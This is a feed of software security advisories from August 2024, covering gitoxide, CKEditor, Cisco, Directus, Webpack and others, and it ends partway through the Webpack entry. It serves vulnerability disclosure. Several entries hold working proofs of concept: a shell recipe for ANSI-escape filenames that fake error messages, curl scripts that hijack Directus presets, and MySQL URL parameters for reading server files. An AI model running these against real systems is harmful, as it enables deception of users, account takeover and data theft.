23.08.2024 02:15:02 | rustsec | [RUSTSEC-2024-0364] gitoxide-core does not neutralize special characters for terminals (low)
### Summary
The `gix` and `ein` commands write pathnames and other metadata literally to terminals, even if they contain characters terminals treat specially, including ANSI escape sequences. This sometimes allows an untrusted repository to misrepresent its contents and to alter or concoct error messages.
### Details
`gitoxide-core`, which provides most underlying functionality of the `gix` and `ein` commands, does not neutralize newlines, backspaces, or control characters—including those that form ANSI escape sequences—that appear in a repository's paths, author and committer names, commit messages, or other metadata. Such text may be written as part of the output of a command, as well as appearing in error messages when an operation fails.

ANSI escape sequences are of particular concern because, when printed to a terminal, they can change colors, including to render subsequent text unreadable; reposition the cursor to write text in a different location, including where text has already been written; clear the terminal; set the terminal title-bar text to arbitrary values; render the terminal temporarily unusable; and other such operations.

The effect is mostly an annoyance. But the author of a malicious repository who can predict how information from the repository may be accessed can cause files in the repository to be concealed or otherwise misrepresented, as well as rewrite all or part of error messages, or mimic error messages convincingly by repositioning the cursor and writing colored text.
### PoC
On a Unix-like system in a POSIX-compatible shell, run:
```sh
git init misleading-path
cd misleading-path
touch "$(printf '\033]0;Boo!\007\033[2K\r\033[91mError: Repository is corrupted. Run \033[96mEVIL_COMMAND\033[91m to attempt recovery.\033[0m')"
git add .
git commit -m 'Initial commit'
```
In the repository—or, if desired, in a clone of it, to show that this is exploitable by getting a user to clone an untrusted repository—run this command, which outputs entries in a three-column form showing type, hash, and filename:
```sh
gix tree entries
```
Although the output is of that form, it does not appear to be. Instead, the output in a terminal looks like this, colorized to appear to be an error message, with `EVIL_COMMAND` in another color, and with no other text:
```text
Error: Repository is corrupted. Run EVIL_COMMAND to attempt recovery.
```
In some terminals, a beep or other sound will be made. In most terminals, the title bar text will be changed to `Boo!`, though in some shells this may be immediately undone when printing the prompt. These elements are included to showcase the abilities of ANSI escape sequences, but they are not usually themselves threats.

To see what is actually produced, `gix tree entries` can be piped to a command that displays special characters symbolically, such as `less` or `cat -v` if available.
```text
BLOB e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 ESC]0;Boo!^GESC[2K^MESC[91mError: Repository is corrupted. Run ESC[96mEVIL_COMMANDESC[91m to attempt recovery.ESC[0m
```
That shows the effect on `gix tree entries`, but various other commands are also affected, and the escape sequences and other special characters can also appear in non-path metadata, such as in the `user.name` used to create a commit.
### Impact
For users who do not clone or operate in clones of untrusted repositories, there is no impact.

Windows is much less affected than Unix-like systems due to limitations on what characters can appear in filenames, and because traditionally Windows terminals do not support as many ANSI escape sequences.

Because different `gix` and `ein` commands display different data in different formats, the author of a malicious repository must guess how it will be used, which complicates crafting truly convincing output, though it may be possible to craft a repository where `gix clone` fails to clone it but produces a misleading message.

Although this is mainly exploitable on systems *other* than Windows, in the ability to produce misleading output this superficially resembles [CVE-2024-35197](https://github.com/advisories/GHSA-49jc-r788-3fc9). But this is much more limited, because:
- The misleading output can only be made to go where the application is already sending output. Redirection is not defeated, and devices to access cannot be chosen by the attacker.
- The misleading output can only take place *when* the application is already producing output. This limitation complicates the production of believable messages.
- Only terminals are affected. Even if a standard stream is redirected to another file or device, these special characters would not have a special effect, unless echoed later without sanitization.
- Reading and blocking cannot be performed.
- Applications other than the gitoxide `gix` and `ein` executables are unaffected. The exception is if another application uses `gitoxide-core`. But this is explicitly discouraged in the `gitoxide-core` documentation and is believed to be rare.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0364

21.08.2024 23:09:16 | npm | [NPM:GHSA-W5PW-GMCW-RFC8] squirrelly Code Injection vulnerability (high)
squirrellyjs squirrelly v9.0.0 was discovered to contain a code injection vulnerability via the component `options.varName`. The issue was fixed in version 9.1.0.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W5PW-GMCW-RFC8

21.08.2024 21:59:32 | npm | [NPM:GHSA-6V96-M24V-F58J] CKEditor4 low-risk cross-site scripting (XSS) vulnerability linked to potential domain takeover (low)
### Affected Packages
The issue impacts only editor instances with enabled [version notifications](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_config.html#cfg-versionCheck).

Please note that this feature is disabled by default in all CKEditor 4 LTS versions. Therefore, if you use CKEditor 4 LTS, it is highly unlikely that you are affected by this vulnerability. If you are unsure, please [contact us](mailto:security@cksource.com).
### Impact
A theoretical vulnerability has been identified in CKEditor 4.22 (and above). In a highly unlikely scenario where an attacker gains control over the https://cke4.ckeditor.com domain, they could potentially execute an attack on CKEditor 4 instances. Although the vulnerability is purely hypothetical, we have addressed it in CKEditor 4.25.0-lts to ensure compliance with security best practices.
### Patches
The issue has been recognized and patched. The fix is available in version 4.25.0-lts.
### For More Information
If you have any questions or comments about this advisory, please email us at [security@cksource.com](mailto:security@cksource.com).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6V96-M24V-F58J

21.08.2024 21:30:42 | npm | [NPM:GHSA-7R32-VFJ5-C2JV] Code Snippet GeSHi plugin has reflected cross-site scripting (XSS) vulnerability (moderate)
### Affected packages
The vulnerability has been discovered in [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. All integrators that use [GeSHi syntax highlighter](https://github.com/GeSHi/geshi-1.0) on the backend side can be affected.
### Impact
A potential vulnerability has been discovered in CKEditor 4 [Code Snippet GeSHi](https://ckeditor.com/cke4/addon/codesnippetgeshi) plugin. The vulnerability allowed a reflected XSS attack by exploiting a flaw in the [GeSHi syntax highlighter library](https://github.com/GeSHi/geshi-1.0) hosted by the victim.

The GeSHi library was included as a vendor dependency in CKEditor 4 source files. In a specific scenario, an attacker could craft a malicious script that could be executed by sending a request to the GeSHi library hosted on a PHP web server.
### Patches
The [GeSHi library](https://github.com/GeSHi/geshi-1.0) is no longer actively maintained. Due to the lack of ongoing support and updates, potential security vulnerabilities have been identified with its continued use. To mitigate these risks and enhance the overall security of the CKEditor 4, we have decided to completely remove the GeSHi library as a dependency. This change aims to maintain a secure environment and reduce the risk of any security incidents related to outdated or unsupported software.

To integrators who still want to use the GeSHi syntax highlighter, we recommend manually adding the [GeSHi library](https://github.com/GeSHi/geshi-1.0). Please be aware of and understand the potential security vulnerabilities associated with its use.

The fix is available in version 4.25.0-lts.
### Acknowledgements
The CKEditor 4 team would like to thank [Jiasheng He](https://github.com/Hebing123) from Qihoo 360 for recognizing and reporting this vulnerability.
### For more information
Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7R32-VFJ5-C2JV

21.08.2024 19:00:00 | cisco | [CISCO-SA-ISE-REST-5BPKRNTZ] Cisco Identity Services Engine REST API Blind SQL Injection Vulnerabilities (medium)
Multiple vulnerabilities in the REST API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct blind SQL injection attacks.

These vulnerabilities are due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit these vulnerabilities by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the affected device.

Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-REST-5BPKRNTZ

21.08.2024 19:00:00 | cisco | [CISCO-SA-ISE-INFO-EXP-VDF8JBYK] Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.

This vulnerability is due to improper enforcement of administrative privilege levels for high-value sensitive data. An attacker with read-only Administrator privileges for the web-based management interface on an affected device could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to collect sensitive information regarding the configuration of the system.

Cisco has released software updates that address CSCwh78725 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwh78725"]. Cisco has not released software updates that address CSCwe48929 ["https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwe48929"]. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INFO-EXP-VDF8JBYK

21.08.2024 19:00:00 | cisco | [CISCO-SA-ISE-CSRF-Y4ZUZ5RJ] Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the affected device with the privileges of the targeted user.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-CSRF-Y4ZUZ5RJ

21.08.2024 19:00:00 | cisco | [CISCO-SA-CUCM-XSS-9ZMFHYZ] Cisco Unified Communications Manager Cross-Site Scripting Vulnerability (medium)
A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.

This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-XSS-9ZMFHYZ

21.08.2024 19:00:00 | cisco | [CISCO-SA-CUCM-DOS-KKHQ43WE] Cisco Unified Communications Manager Denial of Service Vulnerability (high)
A vulnerability in the SIP call processing function of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.

This vulnerability is due to improper parsing of SIP messages. An attacker could exploit this vulnerability by sending a crafted SIP message to an affected Cisco Unified CM or Cisco Unified CM SME device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition that interrupts the communications of reliant voice and video devices.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CUCM-DOS-KKHQ43WE

21.08.2024 23:08:40 | maven | [MAVEN:GHSA-9623-MQMM-5RCF] Undertow vulnerable to Race Condition (high)
A vulnerability was found in Undertow where the ProxyProtocolReadListener reuses the same StringBuilder instance across multiple requests. This issue occurs when the parseProxyProtocolV1 method processes multiple requests on the same HTTP connection. As a result, different requests may share the same StringBuilder instance, potentially leading to information leakage between requests or responses. In some cases, a value from a previous request or response may be erroneously reused, which could lead to unintended data exposure. This issue primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9623-MQMM-5RCF

21.08.2024 23:10:15 | maven | [MAVEN:GHSA-8M84-H9HH-3CFH] Apache SeaTunnel SQL Injection vulnerability (high)
Mysql security vulnerability in Apache SeaTunnel. Attackers can read files on the MySQL server by modifying the information in the MySQL URL: allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360
This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version [1.0.1], which fixes the issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8M84-H9HH-3CFH

21.08.2024 23:10:20 | maven | [MAVEN:GHSA-6247-7862-Q2PQ] Apache Helix Front (UI) component contained a hard-coded secret (high)
The Apache Helix Front (UI) component contained a hard-coded secret, allowing an attacker to spoof sessions by generating their own fake cookies.
This issue affects Apache Helix Front (UI): all versions.
As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6247-7862-Q2PQ

22.08.2024 03:00:00 | freebsd | [FREEBSD:B339992E-6059-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes (high)
Chrome Releases reports: This update includes 38 security fixes:
[358296941] High CVE-2024-7964: Use after free in Passwords. Reported by Anonymous on 2024-08-08
[356196918] High CVE-2024-7965: Inappropriate implementation in V8. Reported by TheDog on 2024-07-30
[355465305] High CVE-2024-7966: Out of bounds memory access in Skia. Reported by Renan Rios (@HyHy100) on 2024-07-25
[355731798] High CVE-2024-7967: Heap buffer overflow in Fonts. Reported by Tashita Software Security on 2024-07-27
[349253666] High CVE-2024-7968: Use after free in Autofill. Reported by Han Zheng (HexHive) on 2024-06-25
[351865302] High CVE-2024-7969: Type Confusion in V8. Reported by CFF of Topsec Alpha Team on 2024-07-09
[360700873] High CVE-2024-7971: Type confusion in V8. Reported by Microsoft Threat Intelligence Center (MSTIC), Microsoft Security Response Center (MSRC) on 2024-08-19
[345960102] Medium CVE-2024-7972: Inappropriate implementation in V8. Reported by Simon Gerst (intrigus-lgtm) on 2024-06-10
[345518608] Medium CVE-2024-7973: Heap buffer overflow in PDFium. Reported by soiax on 2024-06-06
[339141099] Medium CVE-2024-7974: Insufficient data validation in V8 API. Reported by bowu(@gocrashed) on 2024-05-07
[347588491] Medium CVE-2024-7975: Inappropriate implementation in Permissions. Reported by Thomas Orlita on 2024-06-16
[339654392] Medium CVE-2024-7976: Inappropriate implementation in FedCM. Reported by Alesandro Ortiz on 2024-05-10
[324770940] Medium CVE-2024-7977: Insufficient data validation in Installer. Reported by Kim Dong-uk (@justlikebono) on 2024-02-11
[40060358] Medium CVE-2024-7978: Insufficient policy enforcement in Data Transfer. Reported by NDevTK on 2022-07-21
[356064205] Medium CVE-2024-7979: Insufficient data validation in Installer. Reported by VulnNoob on 2024-07-29
[356328460] Medium CVE-2024-7980: Insufficient data validation in Installer. Reported by VulnNoob on 2024-07-30
[40067456] Low CVE-2024-7981: Inappropriate implementation in Views. Reported by Thomas Orlita on 2023-07-14
[350256139] Low CVE-2024-8033: Inappropriate implementation in WebApp Installs. Reported by Lijo A.T on 2024-06-30
[353858776] Low CVE-2024-8034: Inappropriate implementation in Custom Tabs. Reported by Bharat (mrnoob) on 2024-07-18
[40059470] Low CVE-2024-8035: Inappropriate implementation in Extensions. Reported by Microsoft on 2022-04-26
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B339992E-6059-11EF-8A0F-A8A1599412C6

22.08.2024 03:00:00 | freebsd | [FREEBSD:ADDC71B8-6024-11EF-86A1-8C164567CA3C] nginx -- Vulnerability in the ngx_http_mp4_module (medium)
The nginx development team reports: This update fixes the buffer overread vulnerability in the ngx_http_mp4_module.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:ADDC71B8-6024-11EF-86A1-8C164567CA3C

24.08.2024 04:53:58 | fedora | [FEDORA-2024-8382d1b267] Fedora 40: zabbix (critical)
Fix for multiple CVEs
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8382d1b267

24.08.2024 04:53:46 | fedora | [FEDORA-2024-d434721ef8] Fedora 40: python3.9 (medium)
Security fix for CVE-2024-4032 and CVE-2024-6923
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d434721ef8

24.08.2024 04:30:56 | fedora | [FEDORA-2024-c89d2ecdea] Fedora 39: zabbix (critical)
Fix for multiple CVEs
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c89d2ecdea

24.08.2024 04:30:51 | fedora | [FEDORA-2024-b7de0faa8b] Fedora 39: python3.9 (medium)
Security fix for CVE-2024-4032 and CVE-2024-6923
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b7de0faa8b

25.08.2024 07:44:24 | fedora | [FEDORA-2024-bed028af54] Fedora 40: python3.11 (medium)
Security fix for CVE-2024-4032 (rhbz#2293391)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bed028af54

25.08.2024 05:02:27 | fedora | [FEDORA-2024-a4c978fa1c] Fedora 39: python3.11 (medium)
Security fix for CVE-2024-4032 (rhbz#2293391)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a4c978fa1c

25.08.2024 03:00:00 | freebsd | [FREEBSD:49EF501C-62B6-11EF-BBA5-2CF05DA270F3] Gitlab -- vulnerabilities (medium)
Gitlab reports:
The GitLab Web Interface Does Not Guarantee Information Integrity When Downloading Source Code from Releases
Denial of Service by importing maliciously crafted GitHub repository
Prompt injection in "Resolve Vulnerability" results in arbitrary command execution in victim's pipeline
An unauthorized user can perform certain actions through GraphQL after a group owner enables IP restrictions
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:49EF501C-62B6-11EF-BBA5-2CF05DA270F3

26.08.2024 18:17:42 | npm | [NPM:GHSA-6JRJ-VC65-C983] unzip-stream allows Arbitrary File Write via artifact extraction (high)
### Impact
When using the `Extract()` method of unzip-stream, malicious zip files were able to write to paths they shouldn't be allowed to.
### Patches
Fixed in 0.3.2
### References
- https://snyk.io/research/zip-slip-vulnerability
- https://github.com/mhr3/unzip-stream/compare/v0.3.1...v0.3.2
### Credits
Justin Taft from Google
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6JRJ-VC65-C983

26.08.2024 12:52:00 | suse | [SUSE-SU-2024:3010-1] Security update for xen (important)
Security update for xen
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3010-1

26.08.2024 05:05:36 | fedora | [FEDORA-2024-a6817a2e80] Fedora 40: python-webob (medium)
Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a6817a2e80

26.08.2024 05:05:22 | fedora | [FEDORA-2024-6ba57fd2a3] Fedora 40: nginx-mod-fancyindex, nginx, nginx-mod-naxsi, nginx-mod-vts, nginx-mod-modsecurity (medium)
Security: processing of a specially crafted mp4 file by the ngx_http_mp4_module might cause a worker process crash (CVE-2024-7347). Thanks to Nils Bars.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6ba57fd2a3

26.08.2024 05:05:13 | fedora | [FEDORA-2024-80d1fe51d0] Fedora 40: python3-docs, python3.12 (medium)
Update to 3.12.5
Fixes CVE-2024-6923 (email header injection)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80d1fe51d0

26.08.2024 04:32:10 | fedora | [FEDORA-2024-40ff0d8644] Fedora 39: python-webob (medium)
Update to upstream. Fix open redirect issue in 1.8-branch rhbz#2305065
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-40ff0d8644

26.08.2024 04:31:55 | fedora | [FEDORA-2024-8ba5080dfa] Fedora 39: nginx, nginx-mod-naxsi, nginx-mod-vts, nginx-mod-fancyindex, nginx-mod-modsecurity (medium)
Security: processing of a specially crafted mp4 file by the ngx_http_mp4_module might cause a worker process crash (CVE-2024-7347). Thanks to Nils Bars.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8ba5080dfa

26.08.2024 04:31:50 | fedora | [FEDORA-2024-ce1992d46f] Fedora 39: python3.12, python3-docs (medium)
Update to 3.12.5
Fixes CVE-2024-6923 (email header injection)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ce1992d46f

26.08.2024 21:11:53 | almalinux | [ALSA-2024:5815] nodejs:20 security update (moderate)
nodejs:20 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5815

26.08.2024 21:53:15 | almalinux | [ALSA-2024:5814] nodejs:20 security update (moderate)
nodejs:20 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5814

26.08.2024 03:00:00 | cisa | [CISA-2024:0826] CISA Adds One Known Exploited Vulnerability to Catalog (high)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0826

26.08.2024 03:00:00 | debian | [DSA-5758-1] trafficserver (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5758-1

26.08.2024 03:00:00 | redhat | [RHSA-2024:5815] nodejs:20 security update (moderate)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
Security Fix(es):
* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)
* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)
* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5815

26.08.2024 03:00:00 | redhat | [RHSA-2024:5814] nodejs:20 security update (moderate)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
Security Fix(es):
* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)
* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)
* nodejs: fs.lstat bypasses permission model (CVE-2024-22018)
* nodejs: fs.fchown/fchmod bypasses permission model (CVE-2024-36137)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:5814

27.08.2024 22:54:31 | npm | [NPM:GHSA-3FFF-GQW3-VJ86] Directus has an insecure object reference via PATH presets (moderate)
### Impact
Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request. When chained with [CVE-2024-6533](https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw), it could result in account takeover.

This vulnerability occurs because the application only validates the user parameter in the `POST /presets` request but not in the PATCH request.
### PoC
To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

1. Create a preset for a collection. Store the preset id, or use it if it already exists from `GET /presets`. The following example will use the direct_users preset.

```bash
TARGET_HOST="http://localhost:8055"
ATTACKER_EMAIL="malicious@malicious.com"
ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
 -c "${root_dir}/static/attacker_directus_session_token" \
 -H 'Content-Type: application/json' \
 -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

# Store all user's id
curl -s -k "${TARGET_HOST}/users" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data[] | select(.id != \"${attacker_user_id}\")" > "${root_dir}/static/users.json"

# Choose the victim user id from the previous request
victim_user_id="4f079119-2478-48c4-bd3a-30fa80c5f265"

users_preset_id=$(curl -s -k -X 'POST' "${TARGET_HOST}/presets" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"{{tittle}}\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}" | jq -r '.data.id')
```

2. Modify the presets via `PATCH /presets/{id}`, with the malicious configuration and the user ID to which you will assign the preset configuration. The user ID can be obtained from `GET /users`. The following example modifies the title parameter.

```bash
curl -i -s -k -X 'PATCH' "${TARGET_HOST}/presets/${users_preset_id}" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${victim_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"PoC Assign another users presets\",\"subtitle\":\"fakeemail@fake.com\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"
```

Notes:
Each new preset to a specific collection will have an integer consecutive id independent of the user who created it.
The user is the user id of the victim. The server will not validate that we assign a new user to a preset we own.
The app will use the first id preset with the lowest value it finds for a specific user and collection. If we control a preset with an id lower than the current preset id to the same collection of the victim user, we can attack that victim user, or if the victim has not yet defined a preset for that collection, then the preset id could be any value we control. Otherwise, the attacker user must have permission to modify or create the victim presets.
When the victim visits the views of the modified presets, it will be rendered with the new configuration applied.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3FFF-GQW3-VJ86

27.08.2024 22:53:22 | npm | [NPM:GHSA-QJ85-69XF-2VXQ] AWS CDK RestApi not generating authorizationScope correctly in resultant CFN template (moderate)
### Summary
The AWS Cloud Development Kit (CDK) is an open-source framework for defining cloud infrastructure using code. Customers use it to create their own applications which are converted to AWS CloudFormation templates during deployment to a customer's AWS account. CDK contains pre-built components called "constructs" that are higher-level abstractions providing defaults and best practices. This approach enables developers to use familiar programming languages to define complex cloud infrastructure more efficiently than writing raw CloudFormation templates.

We identified an issue in AWS Cloud Development Kit (CDK) which, under certain conditions, can result in granting authenticated Amazon Cognito users broader than intended access. Specifically, it occurs if a CDK application uses the "RestApi" construct with "CognitoUserPoolAuthorizer" as the authorizer and uses authorization scopes to limit access. This issue does not affect the availability of the specific API resources.
### Impact
Authenticated Cognito users may gain unintended access to protected API resources or methods, leading to potential data disclosure and modification issues.
Impacted versions: >=2.142.0;<=2.148.0
### Patches
The patch is included in CDK version >=2.148.1.
### Recommended Actions
* Upgrade your AWS CDK version to 2.148.1 or newer and re-deploy your application(s) to address this issue.
* If you are using older CDK versions before 2.142.0, you are not affected by this issue; however, it is recommended to upgrade to the latest version to receive the latest features and fixes.
* Confirm whether your application(s) is affected by searching for "CognitoUserPoolsAuthorizer" in your CDK application. If it is referenced inside the "RestApi" construct, and the "RestApi" resource or method utilize authorization scopes to limit access, and you deployed your applications using the impacted versions of CDK, your application is affected.
### References
* AWS CDK Documentation: https://docs.aws.amazon.com/cdk/v2/guide/home.html
* AWS CDK RestApi Construct Documentation: https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.aws_apigateway.RestApi.html
* AWS CDK CognitoUserPoolsAuthorizer Documentation: https://docs.aws.amazon.com/cdk/api/v2/docs/aws-cdk-lib.aws_apigateway.CognitoUserPoolsAuthorizer.html
* AWS CDK v2.148.1 Release Notes: https://github.com/aws/aws-cdk/releases/tag/v2.148.1
If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our vulnerability reporting page [1] or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
[1] Vulnerability reporting page: https://aws.amazon.com/security/vulnerability-reporting
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJ85-69XF-2VXQ

27.08.2024 22:50:41 | npm | [NPM:GHSA-4VVJ-4CPR-P986] Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS (moderate)
Hi, Webpack developer team!
### Summary
We discovered a DOM Clobbering vulnerability in Webpack's `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.

We found the real-world exploitation of this gadget in the Canvas LMS, which allows an XSS attack to happen through JavaScript code compiled by Webpack (the vulnerable part is from Webpack). We believe this is a severe issue. If Webpack's code is not resilient to DOM Clobbering attacks, it could lead to significant security vulnerabilities in any web application using Webpack-compiled code.
### Details
#### Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of JS code) living in the existing JavaScript code to transform it into executable code. For more information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
#### Gadgets found in Webpack
We identified a DOM Clobbering vulnerability in Webpack's `AutoPublicPathRuntimeModule`. When the `output.publicPath` field in the configuration is not set or is set to `auto`, the following code is generated in the bundle to dynamically resolve and load additional JavaScript files:

```javascript
/******/ 	/* webpack/runtime/publicPath */
/******/ 	(() => {
/******/ 		var scriptUrl;
/******/ 		if (__webpack_require__.g.importScripts) scriptUrl = __webpack_require__.g.location + "";
/******/ 		var document = __webpack_require__.g.document;
/******/ 		if (!scriptUrl && document) {
/******/ 			if (document.currentScript)
/******/ 				scriptUrl = document.currentScript.src;
/******/ 			if (!scriptUrl) {
/******/ 				var scripts = document.getElementsByTagName("script");
/******/ 				if(scripts.length) {
/******/ 					var i = scripts.length - 1;
/******/ 					while (i > -1 && (!scriptUrl || !/^http(s?):/.test(scriptUrl))) scriptUrl = scripts[i--].src;
/******/ 				}
/******/ 			}
/******/ 		}
/******/ 		// When supporting browsers where an automatic publicPath is not supported you must specify an output.publicPath manually via configuration
/******/ 		// or pass an empty string ("") and set the __webpack_public_path__ variable from your code to use your own logic.
/******/ 		if (!scriptUrl) throw new Error("Automatic publicPath is not supported in this browser");
/******/ 		scriptUrl = scriptUrl.replace(/#.*$/, "").replace(/\?.*$/, "").replace(/\/[^\/]+$/, "/");
/******/ 		__webpack_require__.p = scriptUrl;
/******/ 	})();
```

